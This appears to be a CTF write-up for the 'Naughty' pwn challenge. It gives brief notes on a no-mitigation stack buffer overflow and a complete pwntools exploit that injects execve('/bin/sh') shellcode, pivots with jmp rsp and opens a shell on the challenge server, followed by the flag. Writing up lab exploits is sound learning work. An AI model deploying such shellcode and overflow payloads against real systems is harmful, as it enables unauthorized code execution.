Naughty

Description: You haven’t been naughty, have you?

Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX disabled
PIE:      No PIE (0x400000)
RWX:      Has RWX segments

Notes:

• The binary has no mitigation, so we can do a stack bof and write our shellcode somewhere on the stack
• fgets() reads in 0x47 bytes from the user, the two bytes from the base pointer has to be 0xe4ff, which is the opcode for jmp esp (hint that a pivot is needed)
• Since we are limited on stack space, we could overwrite the return address with a jmp rsp to pivot to the beginning of our buffer to execute system(‘/bin/sh’) shellcode

PoC:

from pwn import *

def build_shellcode():
    shellcode = asm('push rax')
    shellcode += asm('xor rdx, rdx')
    shellcode += asm('xor rsi, rsi')
    shellcode += asm('movabs rbx, 0x68732f2f6e69622f')
    shellcode += asm('push rbx')
    shellcode += asm('push rsp')
    shellcode += asm('pop rdi')
    shellcode += asm('mov al, 0x3b')
    shellcode += asm('syscall')

    return shellcode

def send_payload(shellcode, io):
    payload = shellcode
    payload += b'\x00'*7 # pad 
    payload += b'A'*(39-(len(shellcode))) # junk
    payload += p64(0xe4ff) # JMP ESP opcode for cmp
    payload += b'\x00'*2 # pad
    payload += p64(0x40067f) # jump rsp
    payload += asm('sub rsp, 0x40; jmp rsp') # pivot stack to beginning of buffer to run shellcode

    io.sendlineafter('XMAS', payload)

def main():
    isLocal = False
    isDebug = False

    if isLocal:
        io = process('./chall')
    else:
        io = remote('challs.xmas.htsp.ro', 2000)
    
    if isDebug:
        gdb.attach(io, '''
            b *0x4006b1
            b *0x4006d5
        ''')

    context.log_level = 'debug'
    context.terminal = ['tmux', 'splitw', '-v']
    context.arch = 'amd64'

    shellcode = build_shellcode()
    send_payload(shellcode, io)
    io.interactive()

if __name__=='__main__':
    main()

#X-MAS{sant4_w1ll_f0rg1ve_y0u_th1s_y3ar}